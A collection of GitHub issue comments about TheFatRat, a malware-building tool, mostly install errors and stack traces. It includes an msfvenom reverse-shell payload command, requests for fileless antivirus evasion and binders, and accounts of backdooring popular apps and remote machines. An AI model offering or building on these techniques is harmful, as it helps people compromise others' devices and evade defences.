hi thx for your great work , i have a qst is this working with exetrnal pc/mobile(android) bcz i try it with external mobile and it's not working even if i change my local ip to external ip :/ ps:its work great with local phone

Hi i have got this problem on my kali rolling, i have tried to find the solution over the web but can not find the answer, help me.. here is my choice [05] Backdooring Original apk [Instagram, Line,etc].

W: /usr/bin/aapt: symbol lookup error: /usr/lib/i386-linux-gnu/android/libaapt.so.0: undefined symbol: _ZN7android12AssetManager12addAssetPathERKNS_7String8EPi
Exception in thread "main" brut.androlib.AndrolibException: brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 127): [/usr/bin/aapt, p, --min-sdk-version, 14, --target-sdk-version, 23, --version-code, 103018, --version-name, 1.3.1, -F, /tmp/APKTOOL3270487503658159053.tmp, -0, arsc, -0, arsc, -I, /root/.local/share/apktool/framework/1.apk, -S, /root/TheFatRat/output/original/res, -M, /root/TheFatRat/output/original/AndroidManifest.xml]
at brut.androlib.Androlib.buildResourcesFull(Androlib.java:473)
at brut.androlib.Androlib.buildResources(Androlib.java:407)
at brut.androlib.Androlib.build(Androlib.java:306)
at brut.androlib.Androlib.build(Androlib.java:263)
at brut.apktool.Main.cmdBuild(Main.java:224)
at brut.apktool.Main.main(Main.java:84)
Caused by: brut.androlib.AndrolibException: brut.common.BrutException: could not exec (exit code = 127): [/usr/bin/aapt, p, --min-sdk-version, 14, --target-sdk-version, 23, --version-code, 103018, --version-name, 1.3.1, -F, /tmp/APKTOOL3270487503658159053.tmp, -0, arsc, -0, arsc, -I, /root/.local/share/apktool/framework/1.apk, -S, /root/TheFatRat/output/original/res, -M, /root/TheFatRat/output/original/AndroidManifest.xml]
at brut.androlib.res.AndrolibResources.aaptPackage(AndrolibResources.java:439)
at brut.androlib.Androlib.buildResourcesFull(Androlib.java:459)
... 5 more
Caused by: brut.common.BrutException: could not exec (exit code = 127): [/usr/bin/aapt, p, --min-sdk-version, 14, --target-sdk-version, 23, --version-code, 103018, --version-name, 1.3.1, -F, /tmp/APKTOOL3270487503658159053.tmp, -0, arsc, -0, arsc, -I, /root/.local/share/apktool/framework/1.apk, -S, /root/TheFatRat/output/original/res, -M, /root/TheFatRat/output/original/AndroidManifest.xml]
at brut.util.OS.exec(OS.java:95)
at brut.androlib.res.AndrolibResources.aaptPackage(AndrolibResources.java:433)
... 6 more
[*] Signing output/fatrat_backdoored.apk ..
[+] Infected file output/fatrat_backdoored.apk ready.

cp: cannot stat '/root/TheFatRat/output/output/fatrat_backdoored.apk': No such file or directory
java.io.FileNotFoundException: /root/TheFatRat/backdoored/apkembed.apk (No such file or directory)
at java.util.zip.ZipFile.open(Native Method)
at java.util.zip.ZipFile.(ZipFile.java:219)
at java.util.zip.ZipFile.(ZipFile.java:149)
at java.util.jar.JarFile.(JarFile.java:166)
at java.util.jar.JarFile.(JarFile.java:145)
at com.android.signapk.SignApk.main(SignApk.java:320)
rm: cannot remove 'backdoored/apkembed.apk': No such file or directory

I've runned setup.sh but still says that mingw32 needs to be installed.

Using [05] Backdooring Original apk [Instagram, Line,etc] and then error

hello, in Kali-rolling the setup.sh doesn't works error:
Setup Detected that your previous run was interrupted in middle , fixing your original repositories list .
Your Original repository list was recovered. ;) ..... beginning setup

Cleaning previous repositories cache & updating your repository .

./setup.sh: ligne 49: erreur de syntaxe près du symbole inattendu « fi »
./setup.sh: ligne 49: `fi'

have you got a solution, please ?

Wasn't sure where to put this as I am new to GitHub. I am running Kali Linux rolling 4.6.0-kali1-amd64 and had trouble running your scripts. Just wanted to add the fix I applied in case others are troubled. By the way, great work here.

Problem 1: When first running the program it finds the mingw installation but then right after it fails and says it isn't installer.
Solution: I noticed that in the fatrat program it is checking for the mingw installation twice so then; edit the fatrat program and comment out the second mingw check (specifically lines 266-283)

Problem 2: Compiling was failing when running the Powerfull option
Solution: edit the powerfull.sh script file and replace all instances of this string '586-mingw32msvc-gcc' with this string 'i686-w64-mingw32-gcc'

After those simple tweaks, all is well. Thanks again for writing this, very helpful.

Hi !

You left your IP address and your port in your code ;)

"php/meterpreter/reverse_tcp LHOST=192.168.1.4 LPORT=6000 R > output/$fira.php "

My answer :

msfvenom -p php/meterpreter/reverse_tcp LHOST=$yourip LPORT=$yourport R > output/$fira.php

Very good Job !!

FUD-Stub gets not responding when opening on windows 10 64 BIT

I keep getting this error when running the setp.sh.

/root/Documents/TheFatRat/setup.sh: line 49: syntax error near unexpected token `fi'
/root/Documents/TheFatRat/setup.sh: line 49: `fi'

Hi screetsec,

I got this bug:
How to solve this?

[!]::[Check Dependencies]:
[✔]::[Check User]: root
[✔]::[Internet Connection]: connected!
[✔]::[apache2 Server Kali ]: installation found!
[✔]::[msfconsole]: installation found!
[✔]::[msfvenom]: installation found!
[✔]::[Zenity]: installation found!
[x]::[warning]:this script require mingw32 installed to work

[!]::[please wait]: please run setup.sh ....

I have this problem, what should I do?

Very nice project , would you please add file binder ? it Can combine out put with other file with 100% Fud ?

Thanks .

Hello and thank you for your program,
I generated a 'Powerful.exe' file with the option 2 of TheFatRat program. When I launch it on Windows 7 64 bits or Widows 8 64 bits or Windows 10 64 bits, an error occurred: 'The program has stopped working'. So I can't exploit a device.

I specify when I generate a different RAT with the another options, the .exe file works perfectly and I can exploit devices. But on Windows, Kaspersky delete the .exe file of these RAT.

How can I patch the problem and make 'Powerful.exe' works?

Thank you very munch.

Hi,i come here today because i've got a problem with TheFatRat installation.
The setup.sh script check all the dependencies,and it finds that MinGW compiler isn't installed on my system.
So it tries to install it,spawns a terminal window that disappears immediatly.
When i try to launch thefatrat,it says that the minGW compiler isn't installed,and it ask me to run setup.sh,which is unable to fox it.....
Any idea ? I use Kali Rolling edition (2016.1)

When run payload on Windows machine cmd shell stays open!! Just for information!
And some feature request, add meterpreter/reverse_tcp_dns like option!
Thanks and cool automation script!

Can you build in the option for people to anonymously report if a payload has been detected by a specific AV, which would then appear next to the payload and also show which AV it was detected by.
Thanks

launching the setup.sh script as root which command does not detect my installation of Metasploit in
/usr/local/bin/msfconsole
and unfortunately I have to run the root script. As seen in the screen if you launch which regular user there are no problems, while root you.
I am on gentoo hardened
screenshot:
http://imgur.com/aRMdaBQ

Found it annoying when with the small text on the pop ups so I fixed it and thought you may want to add for everyone :D

https://github.com/coolbotic/TheFatRat

On vista 64 bit. There is no inbuilt powershell and the slow FUD will not work on win vista 64 bit. No options work now. It is all deteced by either av or there is no powershell!

If I want to install the Mac OS X above need to do those jobs?

I was working on installing a backdoor on my android device, in case it is lost or stolen. The first .apk FatRat built installed perfectly, but every one after that has returned with an error "App not installed" I have set my device to allow 3rd party apps, and as I said the first .apk I tried installed just fine, I had messed up on my end and entered the ip incorrectly. I even, in a desperate attempt, tried building a new .apk with the same errors as my first one, and IT would not install on the device.
https://www.youtube.com/watch?v=yoMIbG1JJ74
That is the tutorial I have followed exactly, it's a pretty simple process and I've damn near memorized it at this point.
-Do I need to remove my first installation to try a different one?
-Where does the .apk install to on the device?
-Am I able to change the lhost and lport on the .apk after it has been created, instead of creating multiple .apk files?
-Is there a different process that I am unaware of since I am on a virtual machine (Kali) running on windows 10?

You don't need to walk me through it if there is a nice tutorial or bit of information somewhere that I haven't found just link me and I'll be on my way. Appreciate any help in advance. Sorry to bother, hope I'm in the right place.

systems: ubuntu14.04LTS
sudo apt-get update
sudo apt-get install backdoor-factory
No software package found

Prompt during installation backdoor-factory -> not found。

please

So i have done FUD backdoor in exe file named powerfull.exe and when i try to execute it in my win 10 compuer it opens black shell (like it should) but very soon after that win says powerfull.exe stopped working. I disabled my AV and UAC but same problem.
Anyone have any solution for this? my fatrat is latest possible version

after android app injection and install the final app i always get ' unfortunately app has stopped '
i use parrot sec os linux 3.4
i download apk from googleplay , apkpure .... any site
and it still the problem !!

http://prntscr.com/d6vqae

I was unable to create the pull request from my git to yours because there are massive changes in my git that crashes my firefox when git is analyzing the differences .
FatRat is originally your creation , so in good faith i believe that i should send you a pull request everytime some good changes are made .

FatRat becomes FatRat 1.9beta
and the changes are :

• APK (5) rat rebuild totally changed .
  (adapted backdoor-apk script to fatrat to both work together)

• APKS have a new payload hiding method in rat apk to not be detected .

• Apktool will not be installed no more by setup.sh , the same thing applies to : dx , zipalign
  (apktool on debian repo is 2.2.1 , and that version have a bug that gives error on compiling the apks , so , apktool and android tools were updated to latest version 25.0.2 and embeded in (tools) directory of fatrat .

• Some other changes were made but i can not remember everything now because i have been doing the changes since beginning of last week .

The only way that i see for you to merge my git to yours is :
-cloning my git to your hard disc
-Enter hidden directory .git in my git and change from :
https://github.com/peterpt/TheFatRat
to
https://github.com/Screetsec/TheFatRat

and then over the terminal do a git push to your account , so all files can be changed .

If you do not want to merge then there is no problem .

Anyway , here are the new changes
https://www.youtube.com/watch?v=Nj7AFEBjvdQ

WHen executed it dies on test PC. i see the syn_sent but after a few it stops, any idea? It was not detected by AV

first salamo 3alikom , thanks for this great job, but i launch your payloads the cmd shell window pop out and when i closed it the session is gone fix this please !!! thanks

Payload flash_player.exe doesn't created on kali linux rolling 1
I've all depedencies

cp: cannot stat '/root/TheFatRat/output/output/fatrat_backdoored.apk': No such file or directory
java.io.FileNotFoundException: /root/TheFatRat/backdoored/apkembed.apk (No such file or directory)
at java.util.zip.ZipFile.open(Native Method)
at java.util.zip.ZipFile.(ZipFile.java:219)
at java.util.zip.ZipFile.(ZipFile.java:149)
at java.util.jar.JarFile.(JarFile.java:166)
at java.util.jar.JarFile.(JarFile.java:145)
at com.android.signapk.SignApk.main(SignApk.java:320)
rm: cannot remove 'backdoored/apkembed.apk': No such file or directory

Help me omm ....

why I got a warning this script need a active internet connection?

Is there a way to put my DDNS in LHOST when I select 2nd option at the start?

Hi , i was looking into your script and i notice that on setup the script backs up the sources.list and create a new sources.list with kali repositories , and then do an apt-get update and install the tools .
You should keep in mind that many people may have metasploit installed already in their system not by apt repositories .
You should give an option on setup.sh for user to select where does he have metasploit and its modules installed , instead doing all the current process .
My system is a Devuan (non systemd) , kali sana is systemd , if i did not stop the script when was doing the update , then at this time i had my metasploit instalation on /opt/ messed up with old metasploit that your script was going to install from repositories , and this without even speaking on the incompatibility of devuan repo libraries with kali sana .
Kali Sana repo does not update anymore metasploit-framework , only rolling repositories do that , so according to your script you are installing an old version of metasploit into user linux distro that will never be more updated using the repositories you applied .
An idea is to install metasploit from git (witch envolves a more deeper approach) to user machine and setup your config script to open metasploit from there .
Here it is how should be done from git :
(it says kali wheezy the instructions , but is can be installed in any linux debian or debian forked distros , because the main libraries are available in those distros too) .
http://pastebin.com/STc07QM5

msvenom i dodn have it yet installed here , but i will install it manually , so i can not rely on apt updates , and i will give a look into your script .

You could use a "path.config" file , and setup all tools paths in that file 1 after another , then you could use "sed" to read the path from a tool and declare it as a variable .
ex of "paths.config file :

"
/opt/metasploit-framework/msfvenom
/opt/backdoor-factory/backdoor.py"

on your script you can call sed to read the path of a tool and declare it as a variable , by this , instead using :

"backdoor-factory -f $embed -s $payload -H $yourip -P $yourport -o output/$"

you could use :
"$backdoor -f $embed -s $payload -H $yourip -P $yourport -o output/$"

This concept could be set to those people that have these tools installed from git instead apt .
However these configurations should be set during your "setup.sh" , and a possible choice could be given to user on setup like :

"Metaslpoit was not detected , press y to install it from repository , or press n to configure its path"

something like this , well , was just an idea .

     Author:    Joshua Pitts
     Email:     the.midnite.runr[-at ]gmail<d o-t>com
     Twitter:   @midnite_runr
     IRC:       freenode.net #BDFactory
     
     Version:   3.4.2

[] In the backdoor module
[] Checking if binary is supported
[] Gathering file info
[] Reading win32 entry instructions
[] Looking for and setting selected shellcode
[] Creating win32 resume execution stub
Traceback (most recent call last):
File "/usr/share/backdoor-factory/backdoor.py", line 62, in
class bdfMain():
File "/usr/share/backdoor-factory/backdoor.py", line 610, in bdfMain
result = supported_file.run_this()
File "/usr/share/backdoor-factory/pebin.py", line 168, in run_this
return self.patch_pe()
File "/usr/share/backdoor-factory/pebin.py", line 1799, in patch_pe
_, self.flItms['resumeExe'] = targetFile.resume_execution_32()
File "/usr/share/backdoor-factory/intel/intelCore.py", line 340, in resume_execution_32
CallValue = int(CallValue, 16)
ValueError: invalid literal for int() with base 16: 'dword ptr [0x402000]'
Shell Saved To /backdoored/output/ press any key to continue

Not saving backdoored apk file. The last lines as follows:

File copied with success to : /root/Desktop/TheFatRat-master/backdoored
Removing temporary files from output
Signing your APK file
Usage: signapk publickey.x509[.pem] privatekey.pk8 input.jar output.jar
[!] APK Rat file was not found in : /root/Desktop/TheFatRat-master/backdoored/output/

Hello ,

• While using your Fud 100% Option 2.
• After Powerful- Fud exe Generated .

i set Exploit Handler by Giving Payload windows/meterpreter/reverse_tcp

msf exploit(handler) > exploit

[] Started reverse TCP handler on 192.168.62.128:8985
[] Starting the payload handler...

I m Not Getting Any Shell on Linux machine , I Have Followed all the Steps Mentioned

Here : https://github.com/Screetsec/TheFatRat#getting-started

https://www.youtube.com/watch?v=hjkBttKTVnI

Any Sol?

Hi i have some points important. The first is at little time the program called powerfull close. Other details i think the alert of cmd is unnecessary but i think this deppends of knowledge of people about programming in c. Thanks for this to improve and know more about kali linux and the toolkit.

Latest changes in setup instalation packages can popup errors on executing the ruby script if : imagemagick is not installed :

require 'fileutils' -> https://rubygems.org/gems/fileutils/versions/0.7
requires Rmagick witch dependeds on ImageMagick 6.4.9 or later

imagemagick requires libmagickwand-dev .

resuming :
unless user install these packages using "gem install" , then on a non pentest linux distro an error on ruby script can popup due to these missing packages .

Zip align is not needed in setup now until we implement backdoor-apk script , i forgot to remove it from apt-sources .

Fatrat exe stops when it is executed on win64 os.
I saw 2 or 3 issues that were closed with the same issue.but i cant find the answer.
Leave a proper reply to solution. Thanx

Hi,

When i try to install ./setup.sh it's ok, but i cant install "mingw32".

terminal show me "mingw32 compiler -> not found ".

how can i do?

/ | | ___ | | () __ __ _
| | | ' \ / _ / | |/ / | ' \ / \ |
| || | | | / (| <| | | | | (| | _ _ _
_|| ||_|_||__|| ||_/ | () () ()
|_/
-- -- +=[(c) 2016-2017 | dracos-linux.org | Linuxsec.org | Hacker Indonesia
-- -- +=[ Author: Screetsec < Edo Maland > ]=+ -- --

[!]::[Check Dependencies]:
[✔]::[Distro]: Linux
[✔]::[Check User]: root
[✔]::[Internet Connection]: connected!
[✔]::[Apache2 Server Linux ]: installation found!
[✔]::[Msfconsole]: installation found!
[✔]::[Msfvenom]: installation found!
[✔]::[Zenity]: installation found!
[x]::[warning]:this script require mingw32 installed to work

[!]::Run setup.sh to install ming32

i run setup.sh blablablabla, but not ming32 not get

Can u add support for complete memory integration. For example, can you get the payload to load and run completely in memory and not right any thing to disk, and start up using the registry.

As this would greatly help to evade detection, by creating less of a footprint and have less for the AV to scan additionally, lots of AV don’t scan memory or registry.

Thanks

Sorry for my language i m italian i have try today option Create FUD 100% BACKDOOR and used easybinder " worked always for me" for binder it with one pic and i have set so migrate proccess on msfconsole but the problem is when i run the file generate with easybinder with name pippo.exe he open prompt of windows with name powerfull.exe so he create session on metasploit and migrate the process correct but when i close the prompt of windows powerfull.exe the session are dead .. I have test it direct on my kali linux with wine but think is it same maybe thanks for your support ..

Error: Invalid Payload Selected

Hello!

First, it's really great tool.
I tested it on 32 bit Windows 7 on virtual machine - no problems, everything works.
But tried to test it in normal environment, on my PCs, both are 64 bits, Windows 7 and Windows 10.
It crashes about 3 seconds after launch, does not even estabilish a connection.

Screens:

I use microsploit for creating microsoft office backdoor.
I found this error after creating [2] The Microsoft Office Macro on Windows :
mv: cannot stat ‘/home/silentc0ders/.msf4/local/wwww.docm’: No such file or directory

TheFatRat 1.9.2

I zip up the resulting .EXE (generated one for Windows) and emailed it to myself. When I try to download it, google chrome recognizes the zip file as malware

[Feature Request] Hash Checking
Can you add the option to check the payload hash through VirusTotal, NoDistribute and others to see if the payload has been uploaded and scanned, like Veil-Evasion has.
Thanks

I have installed a backdoor on a remote machine and created a payload and listener with the help of FATRAT AND METASPLOIT. My IP address is dynamic. My question is when my ip address changes how will the remote machine connect back to me